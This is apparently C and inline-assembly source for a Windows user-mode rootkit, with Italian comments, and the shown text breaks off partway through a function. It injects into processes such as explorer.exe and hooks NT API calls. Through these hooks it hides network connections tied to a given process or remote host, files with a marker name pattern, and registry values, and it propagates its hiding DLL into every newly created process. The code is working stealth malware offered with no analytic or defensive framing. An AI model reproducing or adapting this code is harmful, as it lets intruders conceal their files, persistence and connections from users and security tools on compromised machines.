#include "HornHellHide.h"
#include "OpCodeAlign.h"
#define  PROCESSFILE "explorer.exe"
#define REDIR_SIZE 7

extern DWORD ex_ManagerIP;

typedef BOOL (WINAPI *CREATEPROCESS)(LPCTSTR,LPTSTR,LPSECURITY_ATTRIBUTES,LPSECURITY_ATTRIBUTES,BOOL,DWORD,LPVOID,LPCTSTR,LPSTARTUPINFO,LPPROCESS_INFORMATION);
typedef DWORD (WINAPI *NTQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS,PVOID,ULONG,PULONG);
typedef DWORD (WINAPI *NTQUERYDIRECTORYFILE)(HANDLE, HANDLE, PVOID, PVOID, PVOID, PVOID, ULONG, DWORD, BOOLEAN, CHAR *, BOOLEAN);
typedef VOID (WINAPI *DOHIDE)(HANDLE,DWORD, DWORD,CHAR *);
typedef HMODULE (WINAPI *LOADLIBRARY) (CHAR *);
typedef BOOL (WINAPI *FREELIBRARY)(HMODULE);
typedef FARPROC (WINAPI *GETPROCADDRESS) (HINSTANCE, DWORD);
typedef DWORD (WINAPI *RESUMETHREAD) (HANDLE);
typedef DWORD (WINAPI *NTQUERYVALUEKEY)(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD); 

//----------------- Strutture per file hiding e registry -----------------------
#define FileDirectoryInformation 1
#define FileFullDirectoryInformation 2
#define FileBothDirectoryInformation 3
#define FileNamesInformation 12

typedef struct _FILE_DIRECTORY_INFORMATION { 
        ULONG NextEntryOffset;
        ULONG Unknown;
        LARGE_INTEGER CreationTime;
        LARGE_INTEGER LastAccessTime;
        LARGE_INTEGER LastWriteTime;
        LARGE_INTEGER ChangeTime;
        LARGE_INTEGER EndOfFile;
        LARGE_INTEGER AllocationSize; 
        ULONG FileAttributes;
        ULONG FileNameLength;
        WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;

typedef struct _FILE_FULL_DIRECTORY_INFORMATION {
        ULONG NextEntryOffset;
        ULONG Unknown;
        LARGE_INTEGER CreationTime;
        LARGE_INTEGER LastAccessTime;
        LARGE_INTEGER LastWriteTime;
        LARGE_INTEGER ChangeTime;
        LARGE_INTEGER EndOfFile;
        LARGE_INTEGER AllocationSize;
        ULONG FileAttributes;
        ULONG FileNameLength;
        ULONG EaInformationLength;
        WCHAR FileName[1];
} FILE_FULL_DIRECTORY_INFORMATION, *PFILE_FULL_DIRECTORY_INFORMATION;

typedef struct _FILE_BOTH_DIRECTORY_INFORMATION { 
        ULONG NextEntryOffset;
        ULONG Unknown;
        LARGE_INTEGER CreationTime;
        LARGE_INTEGER LastAccessTime;
        LARGE_INTEGER LastWriteTime;
        LARGE_INTEGER ChangeTime;
        LARGE_INTEGER EndOfFile;
        LARGE_INTEGER AllocationSize;
        ULONG FileAttributes;
        ULONG FileNameLength;
        ULONG EaInformationLength;
        UCHAR AlternateNameLength;
        WCHAR AlternateName[12];
        WCHAR FileName[1];
} FILE_BOTH_DIRECTORY_INFORMATION, *PFILE_BOTH_DIRECTORY_INFORMATION; 


typedef struct _FILE_NAMES_INFORMATION {
        ULONG NextEntryOffset;
        ULONG Unknown;
        ULONG FileNameLength;
        WCHAR FileName[1];
} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;


typedef struct _KEY_VALUE_BASIC_INFORMATION {
	ULONG TitleIndex;
	ULONG Type;
	ULONG NameLength;
	WCHAR Name[1];
} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;

typedef struct _KEY_VALUE_FULL_INFORMATION {
	ULONG TitleIndex;
	ULONG Type;
	ULONG DataOffset;
	ULONG DataLentgh;
	ULONG NameLength;
	WCHAR Name[1];
} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;

// Tipi e definizioni necessari per ZwQuerySystemInformation
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
typedef LONG	NTSTATUS;
typedef LONG	KPRIORITY;

typedef struct _CLIENT_ID {
    DWORD	    UniqueProcess;
    DWORD	    UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

typedef struct _VM_COUNTERS {
    SIZE_T	    PeakVirtualSize;
    SIZE_T	    VirtualSize;
    ULONG	    PageFaultCount;
    SIZE_T	    PeakWorkingSetSize;
    SIZE_T	    WorkingSetSize;
    SIZE_T	    QuotaPeakPagedPoolUsage;
    SIZE_T	    QuotaPagedPoolUsage;
    SIZE_T	    QuotaPeakNonPagedPoolUsage;
    SIZE_T	    QuotaNonPagedPoolUsage;
    SIZE_T	    PagefileUsage;
    SIZE_T	    PeakPagefileUsage;
} VM_COUNTERS;

typedef struct _SYSTEM_THREAD_INFORMATION {
    LARGE_INTEGER   KernelTime;
    LARGE_INTEGER   UserTime;
    LARGE_INTEGER   CreateTime;
    ULONG			WaitTime;
    PVOID			StartAddress;
    CLIENT_ID	    ClientId;
    KPRIORITY	    Priority;
    KPRIORITY	    BasePriority;
    ULONG			ContextSwitchCount;
    LONG			State;
    LONG			WaitReason;
} SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;

typedef struct  {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} MNT_UNICODE_STRING;

typedef struct  {
    ULONG           NextEntryDelta;         // offset to the next entry
    ULONG           ThreadCount;            // number of threads
    ULONG           Reserved1[6];           // reserved
    LARGE_INTEGER   CreateTime;             // process creation time
    LARGE_INTEGER   UserTime;               // time spent in user mode
    LARGE_INTEGER   KernelTime;             // time spent in kernel mode
    MNT_UNICODE_STRING  ProcessName;            // process name
    KPRIORITY       BasePriority;           // base process priority
    ULONG           ProcessId;              // process identifier
    ULONG           InheritedFromProcessId; // parent process identifier
    ULONG           HandleCount;            // number of handles
    ULONG           Reserved2[2];           // reserved
    VM_COUNTERS     VmCounters;             // virtual memory counters
    SYSTEM_THREAD_INFORMATION Threads[1];   // threads
} SYSTEM_PROCESS_INFORMATION_NT;
typedef NTSTATUS (WINAPI* ZwQuerySystemInformation_t)(ULONG, PVOID, ULONG, PULONG);


//-------------------------------------------

//-------------------------------------------

typedef struct {
	void *OriginalAPI;  
	// Poi ognuno ci sbatte qui quello che vuole
} INJDATA_WRAP, *PINJDATA_WRAP;

// Parametri da passare al THREAD di hiding
typedef struct {
	DWORD Pid;
	char *dll_name;
} ThreadParams;



#define MAX_DLL_NAME 16
#define MAX_FUNC_NAME 64
typedef struct {
	INJDATA_WRAP *Data;
	DWORD *WrapFunc;
	char DLL[MAX_DLL_NAME];
	char FUNC[MAX_FUNC_NAME];
	unsigned char *ImageBase;
	HANDLE hProc;
} INJDATA_HOOK, *PINJDATA_HOOK;

typedef struct {
	DWORD Image_Base;
	DWORD Loaded_Head;
	HANDLE hProc;
} INJDATA_PEB, *PINJDATA_PEB;


typedef struct {
  WORD Hint;
  char Name1[MAX_FUNC_NAME];
} MY_IMAGE_IMPORT_BY_NAME;


typedef struct { 
  char *OriginalFirstThunk;
  DWORD TimeDateStamp;
  DWORD ForwarderChain;
  char *Name1;
  char *FirstThunk;
} MY_IMAGE_IMPORT_DESCRIPTOR;

typedef struct  {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    PDWORD  *AddressOfFunctions;
    PDWORD  *AddressOfNames;
    PWORD   *AddressOfNameOrdinals;
} MY_IMAGE_EXPORT_DESCRIPTOR;


typedef struct {
	DWORD InLoadNext;
	DWORD InLoadPrev;
	DWORD InMemNext;
	DWORD InMemPrev;
	DWORD InInitNext;
	DWORD InInitPrev;
	DWORD ImageBase;
} MY_LIST_ENTRY, *PMY_LIST_ENTRY;

typedef struct _MIB_TCPROW 
{  DWORD dwState;  
   DWORD dwLocalAddr;  
   DWORD dwLocalPort;  
   DWORD dwRemoteAddr;  
   DWORD dwRemotePort;
} MIB_TCPROW, *PMIB_TCPROW;

typedef struct _MIB_TCPROW_EX
{
      DWORD dwState; 
      DWORD dwLocalAddr;
      DWORD dwLocalPort;
      DWORD dwRemoteAddr;
      DWORD dwRemotePort;
      DWORD dwProcessId;
} MIB_TCPROW_EX, *PMIB_TCPROW_EX;

typedef struct _IO_STATUS_BLOCK {
	DWORD dummy;
    ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;


/*
void SearchImportTable (INJDATA_HOOK *pData)
{
	// XXX - Verficare se ci sono altri image base e controllare che inizi con MZ
	unsigned char MZ_Header[64]; 
	DWORD PE_Offs;
	IMAGE_NT_HEADERS PE_Header;
	DWORD bytesRead, mWrapFunc;
	MY_IMAGE_IMPORT_DESCRIPTOR *Dll_Import;
	int Index;
	char Dll_Name[MAX_DLL_NAME];
	char **Import_Table;
	MY_IMAGE_IMPORT_BY_NAME *pStructImport_Entry;
	MY_IMAGE_IMPORT_BY_NAME StructImport_Entry;



	ReadProcessMemory(pData->hProc, pData->ImageBase, MZ_Header, 64, &bytesRead);
	if (bytesRead != 64)
		return;

	if (MZ_Header[0]!='M' || MZ_Header[1]!='Z') 
		return;
	
	PE_Offs = *((DWORD *)(MZ_Header+0x3c));
	ReadProcessMemory(pData->hProc, pData->ImageBase + PE_Offs, &PE_Header, sizeof(PE_Header), &bytesRead);
	if (bytesRead != sizeof(PE_Header))
		return;

	// Qualche controllo sugli headers
	if (PE_Header.Signature != 0x00004550 || PE_Header.OptionalHeader.NumberOfRvaAndSizes < 2 ||
		PE_Header.OptionalHeader.DataDirectory[1].VirtualAddress == 0) 
		return;
	

	Dll_Import = (MY_IMAGE_IMPORT_DESCRIPTOR *) malloc(PE_Header.OptionalHeader.DataDirectory[1].Size);
	// Primo elemento dell'array delle DLL importate
	ReadProcessMemory(pData->hProc, pData->ImageBase + PE_Header.OptionalHeader.DataDirectory[1].VirtualAddress, Dll_Import, PE_Header.OptionalHeader.DataDirectory[1].Size, &bytesRead);
	if (bytesRead != PE_Header.OptionalHeader.DataDirectory[1].Size)
		return;

	
	// Scorre la lista di DLL importate
	for (;; Dll_Import++)
	{	
		ReadProcessMemory(pData->hProc, pData->ImageBase + (DWORD)Dll_Import->Name1, Dll_Name, MAX_DLL_NAME, &bytesRead);
		if (bytesRead != MAX_DLL_NAME || Dll_Import->Name1 == NULL )
			return;

		if (!stricmp(pData->DLL, Dll_Name))
			break;
	}
	

	
	// Scorre la lista di nomi importati da NTDLL.DLL
	Import_Table = (char **) (pData->ImageBase + (DWORD)Dll_Import->OriginalFirstThunk);

	// E' l'indice zero-based di NtQuerySystemInformation
	Index = -1;
	for (;;Import_Table++)
	{
		
		ReadProcessMemory(pData->hProc, Import_Table, &pStructImport_Entry, 4, &bytesRead);
		if (bytesRead != 4 || pStructImport_Entry == NULL)
			return;

		ReadProcessMemory(pData->hProc, pData->ImageBase + (DWORD)pStructImport_Entry, &StructImport_Entry, MAX_FUNC_NAME + 2, &bytesRead);
		if (bytesRead != sizeof(StructImport_Entry))
			return;

		Index++;
		
		if (!stricmp(pData->FUNC, StructImport_Entry.Name1))
			break;

	} 


	// Ha trovato la funzione
	// Ora e' l'indirizzo della jump table
	Import_Table = (char **)(pData->ImageBase + (DWORD)Dll_Import->FirstThunk + Index*4);
	
	// Salva la vecchia API
	ReadProcessMemory(pData->hProc,Import_Table, &mWrapFunc, 4, &bytesRead);
	if (bytesRead != 4)
		return;

	WriteProcessMemory(pData->hProc, &pData->Data->OriginalAPI, &mWrapFunc, 4, &bytesRead);
	// Sovrascrive l'indirizzo nella import table con la funzione di wrap
	WriteProcessMemory(pData->hProc,Import_Table, &pData->WrapFunc, 4, &bytesRead);
}











void SearchExportTable (INJDATA_HOOK *pData)
{
	// XXX - Verficare se ci sono altri image base e controllare che inizi con MZ
	unsigned char MZ_Header[64]; 
	IMAGE_NT_HEADERS PE_Header;
	DWORD bytesRead, mWrapFunc;
	MY_IMAGE_EXPORT_DESCRIPTOR *Dll_Export;
	DWORD Index, Ordinal=0;
	char Func_Name[MAX_FUNC_NAME], *pFunc_Name;


		

	ReadProcessMemory(pData->hProc, pData->ImageBase, MZ_Header, 64, &bytesRead);
	if (bytesRead != 64)
		return;

	if (MZ_Header[0]!='M' || MZ_Header[1]!='Z') 
		return;
	

	ReadProcessMemory(pData->hProc, pData->ImageBase + MZ_Header[0x3c], &PE_Header, sizeof(PE_Header), &bytesRead);
	if (bytesRead != sizeof(PE_Header))
		return;

	// Qualche controllo sugli headers
	if (PE_Header.Signature != 0x00004550 || PE_Header.OptionalHeader.NumberOfRvaAndSizes < 1 ||
		PE_Header.OptionalHeader.DataDirectory[0].VirtualAddress == 0) 
		return;
	

	Dll_Export = (MY_IMAGE_EXPORT_DESCRIPTOR *) malloc(PE_Header.OptionalHeader.DataDirectory[0].Size);
	// Primo elemento dell'array delle DLL importate
	ReadProcessMemory(pData->hProc, pData->ImageBase + PE_Header.OptionalHeader.DataDirectory[0].VirtualAddress, Dll_Export, PE_Header.OptionalHeader.DataDirectory[0].Size, &bytesRead);
	if (bytesRead != PE_Header.OptionalHeader.DataDirectory[0].Size)
		return;


	// Scorre la lista di DLL importate
	for (Index=0; Index < Dll_Export->NumberOfNames ; Index++)
	{	
		ReadProcessMemory(pData->hProc, pData->ImageBase + (DWORD)Dll_Export->AddressOfNames + Index*4, &pFunc_Name, 4, &bytesRead);
		if (bytesRead != 4 || pFunc_Name == NULL )
			return;

		ReadProcessMemory(pData->hProc, pData->ImageBase + (DWORD)pFunc_Name, Func_Name, MAX_FUNC_NAME, &bytesRead);
		if (bytesRead != MAX_FUNC_NAME)
			return;

		if (!stricmp(pData->FUNC, Func_Name))
			break;
	}
	
	if(Index >= Dll_Export->NumberOfNames)
		return;

	// Legge Ordinale
	ReadProcessMemory(pData->hProc, pData->ImageBase + (DWORD) Dll_Export->AddressOfNameOrdinals + Index*2, &Ordinal, 2, &bytesRead);
	if (bytesRead != 2)
		return;
	
	ReadProcessMemory(pData->hProc, pData->ImageBase + (DWORD) Dll_Export->AddressOfFunctions + Ordinal*4, &mWrapFunc, 4, &bytesRead);
	if (bytesRead != 4)
		return;

	mWrapFunc = (DWORD)mWrapFunc + (DWORD)pData->ImageBase;

	WriteProcessMemory(pData->hProc, &pData->Data->OriginalAPI, &mWrapFunc, 4, &bytesRead);
	
	// Sovrascrive l'indirizzo nella EXPORT table con la funzione di wrap
    pData->WrapFunc = (DWORD *)((DWORD)pData->WrapFunc - (DWORD)pData->ImageBase); 
	WriteProcessMemory(pData->hProc,pData->ImageBase + (DWORD) Dll_Export->AddressOfFunctions + Ordinal*4, &pData->WrapFunc, 4, &bytesRead);


}








*/




//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////
//////////////////////////        WRAPPERS          //////////////////////////
//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////

/*typedef struct {
	DWORD WQuerySystemInformation;
	int PID1;
} NTQUERYSYSTEMINFORMATIONTM_WRAP, *PNTQUERYSYSTEMINFORMATIONTM_WRAP;*/

typedef struct {
	char Wrapped_Code[24];
	int PID1;
} NTQUERYSYSTEMINFORMATION_WRAP, *PNTQUERYSYSTEMINFORMATION_WRAP;


/*
typedef struct {
	CREATEPROCESS WCreateProcess;  // DEVE ESSERE IL PRIMO ELEMENTO DELLA STRUTTURA
	int PID_Explorer;
	int Remote_Host;
	LOADLIBRARY m_LoadLibrary;
	FREELIBRARY m_FreeLibrary;
	GETPROCADDRESS m_GetProcAddress;
	RESUMETHREAD m_ResumeThread;
	char LibName[256];
} NTCREATEPROCESS_WRAP, *PNTCREATEPROCESS_WRAP;
*/
typedef struct {
	char Wrapped_Code[24];
	int PID_Explorer;
	int Remote_Host;
	LOADLIBRARY m_LoadLibrary;
	FREELIBRARY m_FreeLibrary;
	GETPROCADDRESS m_GetProcAddress;
	char LibName[256];
} NTCREATEPROCESSRW_WRAP, *PNTCREATEPROCESSRW_WRAP;

typedef struct {
	char Wrapped_Code[24];
	NTQUERYVALUEKEY m_QueryValue;
} NTQUERYKEY_WRAP, *PQUERYKEY_WRAP;

typedef struct {
	char Wrapped_Code[24];
	int PID1;
	int Remote_Host;
} NTDEVICEIOCONTROLFILE_WRAP, *PNTDEVICEIOCONTROLFILE_WRAP;

typedef struct {
	char Wrapped_Code[24];
} NTQUERYDIRECTORYFILE_WRAP, *PNTQUERYDIRECTORYFILE_WRAP;

typedef struct {
	char Wrapped_Code[24];
} NTENUMERATEVALUEKEY_WRAP, *PNTENUMERATEVALUEKEY_WRAP;

/*
typedef struct {
	NTQUERYDIRECTORYFILE WQueryDirectoryFile;
} NTQUERYDIRECTORYFILEEXPLORER_WRAP, *PNTQUERYDIRECTORYFILEEXPLORER_WRAP;
*/

static DWORD WINAPI WrapNtDeviceIoControlFile(
  DWORD arg1 ,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  PIO_STATUS_BLOCK IoStatusBlock,
  ULONG IoControlCode,
  char * InputBuffer,
  ULONG InputBufferLength,
  PVOID OutputBuffer,
  ULONG OutputBufferLength)
{
	BOOL ret_code;
	NTDEVICEIOCONTROLFILE_WRAP *pData;
	BOOL ext, inter = FALSE;


	if(	IoControlCode  == 0x000120003 &&
		InputBuffer && OutputBuffer &&  OutputBufferLength > 0 && InputBufferLength > 0 &&
		InputBuffer[0] == 0x00 && InputBuffer[1] == 0x04 && InputBuffer[17] == 0x01)
	{
			inter = TRUE;
			if (InputBuffer[16] == 0x2)
				ext = TRUE;
			else
			{
				ext = FALSE;
				//InputBuffer[16] = 0x2;
			}
				
	}
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[OutputBufferLength]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[OutputBuffer]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InputBufferLength]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InputBuffer]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[IoControlCode]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[IoStatusBlock]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX


	};
	
	if(inter)
	{
		DWORD len = IoStatusBlock->Information;	
		//MIB_TCPROW_EX *Src;
		MIB_TCPROW_EX *row_ex;
		MIB_TCPROW *row;
		char *Src;
		char *Dst;
		
		//Src = (MIB_TCPROW_EX *)OutputBuffer;
		Src = (char *)OutputBuffer;
		Dst = (char *)OutputBuffer;
		IoStatusBlock->Information = 0;

		while (len > 0)
		{
			if(ext)
			{	
				row_ex = (MIB_TCPROW_EX *)Src;
				if (row_ex->dwProcessId != pData->PID1)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW_EX));
					Dst += sizeof(MIB_TCPROW_EX);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW_EX);
				}
				Src += sizeof(MIB_TCPROW_EX);
				len -= sizeof(MIB_TCPROW_EX);
			}
			else
			{
				row = (MIB_TCPROW *)Src;
				if(row->dwRemoteAddr != pData->Remote_Host)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW));
					Dst += sizeof(MIB_TCPROW);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW);
				}
				Src += sizeof(MIB_TCPROW);
				len -= sizeof(MIB_TCPROW);
			}
		}
	}

    return ret_code;
}


typedef enum _KEY_VALUE_INFORMATION_CLASS {
  KeyValueBasicInformation,
  KeyValueFullInformation,
  KeyValuePartialInformation
} KEY_VALUE_INFORMATION_CLASS;

typedef enum _KEY_INFORMATION_CLASS {
  KeyBasicInformation,
  KeyNodeInformation,
  KeyFullInformation 
} KEY_INFORMATION_CLASS;


static DWORD WINAPI WrapNtEnumerateValueKey(
  DWORD arg1,
  DWORD RIndex,
  DWORD InformationClass,
  DWORD *KeyValueInformation,
  DWORD InformationLen,
  DWORD *ResultLen)
{
#define NAME_K_LEN 256

	DWORD ret_code;
	NTENUMERATEVALUEKEY_WRAP *pData;
	char *ValueName;
	DWORD TIndex=0, TFound=0;
	char LocalKeyName[NAME_K_LEN];
	DWORD LenRes;
	DWORD Backdoor = 0;

RegKeyRestart:
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 LEA  EAX, [LenRes]
	 PUSH EAX
	 MOV  EAX, 0FFh
	 PUSH EAX
	 LEA  EAX, [LocalKeyName]
	 PUSH EAX
	 MOV  EAX, 0
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[TIndex]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};

	if (InformationClass == 0xABADC0DE) {
		InformationClass = 0;
		Backdoor = 1;
	}

	// If success. RIndex e' quello richiesto.
	if (LenRes>0 && ret_code==0)
	{
		ValueName = (char *)(((KEY_VALUE_BASIC_INFORMATION *)LocalKeyName)->Name);

		if (ValueName[0]!='*' || ValueName[2]!='_' || Backdoor)
			TFound++;

		if (TFound < (RIndex+1))
		{
			TIndex++;
			goto RegKeyRestart;
		}
	} 

__asm {
	 MOV ESI, DWORD PTR SS:[pData]

	 MOV  EAX,DWORD PTR SS:[ResultLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InformationLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[KeyValueInformation]
	 PUSH EAX
	 MOV  EAX, DWORD PTR SS:[InformationClass]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[TIndex]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};

	return ret_code;
}


typedef  struct {
  LARGE_INTEGER  LastWriteTime;
  ULONG  TitleIndex;
  ULONG  ClassOffset;
  ULONG  ClassLength;
  ULONG  SubKeys;
  ULONG  MaxNameLen;
  ULONG  MaxClassLen;
  ULONG  Values;
  ULONG  MaxValueNameLen;
  ULONG  MaxValueDataLen;
  WCHAR  Class[1];
} KEY_FULL_INFORMATION; 



static DWORD WINAPI WrapQueryKey(
  DWORD KeyHand,
  KEY_INFORMATION_CLASS InformationClass,
  KEY_FULL_INFORMATION *KeyInformation,
  DWORD InformationLen,
  DWORD *ResultLen)
{
	DWORD ret_code;
	NTQUERYKEY_WRAP *pData;
	char *ValueName;
	char LocalKeyName[NAME_K_LEN];
	DWORD LenRes;
	DWORD Index;
	DWORD Found = 0;

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI
	}

	for(Index = 0;;Index++) {
		ret_code = pData->m_QueryValue(KeyHand, Index, 0xABADC0DE, (DWORD)LocalKeyName, NAME_K_LEN, (DWORD)&LenRes);

		if ( LenRes<=0 || ret_code!=0)
			break;

		ValueName = (char *)(((KEY_VALUE_BASIC_INFORMATION *)LocalKeyName)->Name);
		if (ValueName[0]=='*' && ValueName[2]=='_')
			Found=1;		
	}
		
__asm {
	 MOV ESI, DWORD PTR SS:[pData]

	 MOV  EAX,DWORD PTR SS:[ResultLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InformationLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[KeyInformation]
	 PUSH EAX
	 MOV  EAX, DWORD PTR SS:[InformationClass]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[KeyHand]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};

	if (Found == 1 && InformationClass == KeyFullInformation && KeyInformation && InformationLen >= 36) 
		if (KeyInformation->Values > 0)
			KeyInformation->Values--;

	return ret_code;
}



static DWORD WINAPI WrapNtQueryDirectoryFile(
  DWORD arg1 ,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  char *FileInformation,
  ULONG FileInformationLength,
  DWORD FileInformationClass,
  DWORD arg9,
  DWORD arg10,
  DWORD arg11)
{
	DWORD ret_code, b_len;
	DWORD *old_b_len = NULL;
	NTQUERYDIRECTORYFILE_WRAP *pData;
	char *Src;
	char *file_name;
	BOOLEAN found = FALSE;

#define NO_SUCH_FILE 0xC000000F

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg11]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg10]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg9]
	 PUSH EAX

	 MOV  EAX,DWORD PTR SS:[FileInformationClass]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[FileInformationLength]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[FileInformation]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};
	
	if(ret_code != 0 || FileInformationLength <= 0)
	   return ret_code;
		
	Src = (char *)FileInformation;

	if (FileInformationClass != FileDirectoryInformation &&
		FileInformationClass != FileFullDirectoryInformation &&
		FileInformationClass != FileBothDirectoryInformation &&
		FileInformationClass != FileNamesInformation)
		return ret_code;

	do {
		// Tanto per tutte le strutture e' sempre la prima entry
		b_len = ((FILE_DIRECTORY_INFORMATION *)Src)->NextEntryOffset;


		if (FileInformationClass == FileDirectoryInformation) 
			file_name = (char *)(((FILE_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileFullDirectoryInformation) 
			file_name = (char *)(((FILE_FULL_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileBothDirectoryInformation) 
			file_name = (char *)(((FILE_BOTH_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileNamesInformation) 
			file_name = (char *)(((FILE_NAMES_INFORMATION *)Src)->FileName);

		// Dobbiamo cancellare questa entry
		if (file_name[0]=='_' && file_name[2]=='(')
		{
			if (old_b_len) 
			{
				*old_b_len += b_len;
				
				// E' l'ultima entry
				if (b_len == 0)
					*old_b_len = 0;
			}
			else // E' la prima entry
			{
				FileInformationLength -= b_len;
				if (FileInformationLength >0)
				{
					memcpy(Src, Src + b_len, FileInformationLength); 
					Src -= b_len; // Per compensare il + di dopo 
				}
			}
		}
		else 
		{
			found = TRUE;
			old_b_len = &((FILE_DIRECTORY_INFORMATION *)Src)->NextEntryOffset;
		}

		Src += b_len;
	} while(b_len!=0);

	if (!found)
		return NO_SUCH_FILE;

    return ret_code;
}


static DWORD WINAPI WrapNtCreateProcess(
  PHANDLE hProcess,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  DWORD arg6,
  DWORD arg7,
  DWORD arg8)
{
	BOOL ret_code;
	NTCREATEPROCESSRW_WRAP *pData;
	HMODULE HideDLL;
	DOHIDE m_doHide;
	
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg8]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg7]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg6]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[hProcess]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX

	};
	
	HideDLL = pData->m_LoadLibrary(pData->LibName);
	if (!HideDLL)
		return ret_code;
	m_doHide = (DOHIDE)pData->m_GetProcAddress(HideDLL, 0x0002);
	m_doHide(*hProcess, pData->PID_Explorer, pData->Remote_Host ,pData->LibName);
	
	// align the stack
	__asm {
		POP EAX
		POP EAX
		POP EAX
		POP EAX
	};
	pData->m_FreeLibrary(HideDLL);

	return ret_code;
}

static DWORD WINAPI WrapNtCreateProcessEx(
  PHANDLE hProcess,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  DWORD arg6,
  DWORD arg7,
  DWORD arg8,
  DWORD arg9)
{
	BOOL ret_code;
	NTCREATEPROCESSRW_WRAP *pData;
	HMODULE HideDLL;
	DOHIDE m_doHide;
	
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

